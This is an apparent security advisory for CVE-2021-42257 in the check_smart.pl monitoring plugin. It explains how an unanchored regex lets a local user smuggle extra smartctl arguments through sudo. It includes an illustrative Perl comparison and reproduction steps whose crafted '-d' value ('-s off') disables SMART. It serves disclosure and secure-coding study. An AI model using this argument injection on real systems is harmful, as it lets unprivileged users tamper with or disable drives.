check_smart.pl: unprivileged user can alter hard drive settings (CVE-2021-42257)
#CVE #local #sudo
Introduction
check_smart.pl is a plugin to monitor the values of SMART attributes of hard
disk and solid state drives, based on smartmontools. It is intended for
integration with systems monitoring software, e.g. Nagios, Icinga, Shinken or
Naemon.
During a routine audit of custom scripts in openSUSE, a vulnerability was
discovered: check_smart.pl from version 6.1 through 6.9 insufficiently
validated its input, allowing any unprivileged local user to modify SMART
settings, disable SMART monitoring entirely, shut down a drive or degrade a
drive's performance by disabling its read cache. The bug was fixed with the
release of version 6.9.1.
Details
check_smart.pl needs to run as root in order to execute smartctl. This is
achieved with an entry in /etc/sudoers, which allows a less privileged user,
e.g. the one the monitoring system runs under, to execute it. User input that
is passed to smartctl is sufficiently validated apart from one minor oversight.
The -d parameter is validated as follows:
if (-b $opt_dl || -c $opt_dl || $opt_dl =~ m/\/dev\/bus\/\d/) {
# OK
} else {
# NOT OK
}
Later on, this parameter is passed verbatim to smartctl:
my $full_command = "$smart_command -d $interface -Hi $device";
In short, the script will accept:
- block special devices
- char special devices
- any path matching the regex /dev/bus/\d
Critically, the regex is not anchored, so it matches even when /dev/bus/\d is
just a substring of an arbitrary path, for example /tmp/dev/bus/1/sda. Because
the accepted value is then interpolated into the command line, this can be
exploited to pass arbitrary parameters to smartctl.
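The following added example (not code from check_smart.pl and not the upstream fix) contrasts the unanchored check quoted above with a stricter one and shows how a string-built command line turns the accepted value into extra smartctl arguments. The function names, the stricter rules and the sample values are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# The check quoted above: the regex is unanchored, so it matches anywhere.
sub weak_accepts {
    my ($dev) = @_;
    return (-b $dev || -c $dev || $dev =~ m/\/dev\/bus\/\d/) ? 1 : 0;
}

# Hypothetical stricter check (an assumption, not the upstream fix): the whole
# value must be a single path under /dev built from a conservative character
# set, and anything other than /dev/bus/N must be a block or char special file.
sub strict_accepts {
    my ($dev) = @_;
    return 0 unless $dev =~ m{\A/dev/[A-Za-z0-9_./-]+\z};
    return 0 if $dev =~ m{(?:\A|/)\.\.(?:/|\z)};    # no ".." path components
    return 1 if $dev =~ m{\A/dev/bus/\d+\z};
    return (-b $dev || -c $dev) ? 1 : 0;
}

# String-built command, as in the line quoted above. Splitting on whitespace
# approximates what the shell does: spaces in $device become argv boundaries.
sub argv_from_string {
    my ($interface, $device) = @_;
    my $full_command = "smartctl -d $interface -Hi $device";
    return [ split ' ', $full_command ];
}

# List-built command: each element is exactly one argv entry, whatever it contains.
sub argv_from_list {
    my ($interface, $device) = @_;
    return [ 'smartctl', '-d', $interface, '-Hi', $device ];
}

# Constructed sample values; the result for /dev/sda depends on the host.
for my $dev ('/dev/sda', '/dev/bus/0', '/tmp/dev/bus/1/sda -s off') {
    printf "%-30s weak=%d strict=%d\n", "'$dev'",
        weak_accepts($dev), strict_accepts($dev);
    printf "  string-built argv: %s\n", join(' | ', @{ argv_from_string('auto', $dev) });
    printf "  list-built argv:   %s\n", join(' | ', @{ argv_from_list('auto', $dev) });
}
```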
Steps to reproduce
su -l -s /bin/bash nagios
mkdir -p /tmp/dev/bus/1/
ln -s /dev/sda /tmp/dev/bus/1/
ls -l /tmp/dev/bus/1/sda
/usr/lib/nagios/plugins/check_smart --debug -i auto -d "/tmp/dev/bus/1/sda -s off"
SMART Disabled.
Upstream bugfix
Upstream (Claudio Kuenzler) was very responsive and quickly released version 6.9.1 to fix the issue.